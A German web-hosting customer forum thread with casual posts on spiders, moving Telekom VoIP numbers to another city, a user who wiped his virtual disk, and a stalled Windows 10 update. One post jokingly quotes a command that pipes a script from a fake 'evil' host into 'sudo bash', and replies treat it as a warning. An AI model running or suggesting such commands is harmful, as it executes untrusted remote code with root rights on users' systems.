Das längste Thema

  • Ihr seid die Nemesis aller Arachnophoben!=O


    (Sind aber dennoch anmutige Tierchen).

    Also was hatten wir da? Eine apulische Wolfsspinne? Eine ??? und ein Totholzstachelwolf? Ich liege wohl überall daneben...

  • Sagt mal Leute,


    kann ich die Telefonnummern eines digitalen Anschluss bei der Telekom aus Berlin auch in Aachen nutzen?


    Würde gerne eine unserer 3 Rufmummern mit Berliner Vorwahl mit in die Aachener Wohnung nehmen. Die anderen beiden können in Berlin bleiben.


    Das sollte im digitalen Zeitalter doch irgendwie funktionieren, oder? Würde dir Nummer dann gerne wnen möglich in die Aachener Fritzbox integrieren. Die 3 neuen Nummern in Aachen werden nicht wirklich benötigt.

    Meine Produkte: definitiv zu viele, RS, VPS, Domains, Webhosting, ...

  • kann ich die Telefonnummern eines digitalen Anschluss bei der Telekom aus Berlin auch in Aachen nutzen?

    An einem IP-basierten Telekomanschluss: Ja. Zumindest ging das früher. Ich hatte meine Nummer auf dem Handy konfiguriert und war bei allen Telekom-WLANs (Mama, Freunde, Vereinsheim,...) erreichbar. Per VPN ins Heimnetz einwählen, dann ging das auch Mobil. Die Qualität war aber unterirdisch, würde ich nicht empfehlen ;)

    Stichwort: Nomadische Nutzung

    Du brauchst dafür einen Account (hast du ja sicher schon), damit du dich einloggen kannst (am Heimanschluss ginge das auch ohne Login)

    https://www.telekom.de/hilfe/f…n-clients?samChecked=true

  • Ja ist kein Problem!

    Registriere die jeweils gewünschten Rufnummern in Aachen und Berlin und gut. Pass nur auf, dass nicht eine Rufnummer doppelt (also an beiden Standorten) registriert ist.

    Webhosting: Bestprice Classic

    Server: RS Frankenstein - VPS 200 G8 BF20

  • Mit dem Befehl hast du die ersten 1GB deiner virtuellen Festplatte mit nullen überschrieben.


    Mehr als ein Backup einzuspielen wird dir nicht übrig bleiben..

    Der arme Typ war ein schönes Beispiel für "Befehle erst verstehen bevor man sie eintippt". Pinguin-Betriebssysteme können da erstaunlich schnell und grausam sein.


    PS: Hab ein neues Servertool gefunden, das test ich mal kurz. Ist auch schnell installiert:

    Code
    wget -O - http://supertool.evil/install.sh | sudo bash

    ;)

  • Pinguin-Betriebssysteme können da erstaunlich schnell und grausam sein.

    Solch eine Erfahrung hat wohl fast jeder in seinen Anfängen gemacht.. irgendwas "schnell" mit einem Befehl aus dem Internet fixen wollen und schon ist alles am Sack.. :wacko:

    Aber wenn man daraus lernt, war es ja was wert xD


    PS: Hab ein neues Servertool gefunden, das test ich mal kurz. Ist auch schnell installiert:

    So was ähnliches hab ich schon mal auf Twitter gelesen.. :D

    Seitdem lade ich das Script immer erst runter und überfliege es zumindest mal, bevor ich es in bash haue!..

    Meine (Netcup) Produkte: S 1000 G7, VPS 200 G8 Ostern 2019, IPs, Failover..

  • ich find es echt spannend, seit offiziel 27. Mai soll das neue große Update von Win10 ausgerollt werden;

    mit dem Update kommt nix, und hilft man mit dem Update-Tool nach, dann klappt das in der VM aber

    nicht auf dem PC ..., beim PC lädt er nix down ...; des erklär mal jemanden ...

    Grüße / Greetings

    Walter H.


    RS, VPS, Webhosting - was man halt so braucht;)

  • ich find es echt spannend, seit offiziel 27. Mai soll das neue große Update von Win10 ausgerollt werden;

    mit dem Update kommt nix, und hilft man mit dem Update-Tool nach, dann klappt das in der VM aber

    nicht auf dem PC ..., beim PC lädt er nix down ...; des erklär mal jemanden ...

    Hatte ich auch schon ein paar mal. Das ist halt bei Windows im Preis inklusive, dass diverse Dinge öfter mal aus unerfindlichen Gründen nicht funktionieren.


    Wenn du es unbedingt benötigst, einfach mal den manuellen Updater runterladen, damit kann man das Update i.d.R. manuell anstoßen und er installiert es dir dann.

    "Denn der radikalste Zweifel ist der Vater der Erkenntnis."

    -Max Weber

  • ich find es echt spannend, seit offiziel 27. Mai soll das neue große Update von Win10 ausgerollt werden;

    mit dem Update kommt nix, und hilft man mit dem Update-Tool nach, dann klappt das in der VM aber

    nicht auf dem PC ..., beim PC lädt er nix down ...; des erklär mal jemanden ...

    Staged Rollout.

    EiWoMiSau | VPS Eierpower 1 Ostern 2019 | VPS Karneval 2020 | ARM 1000 G11 Beta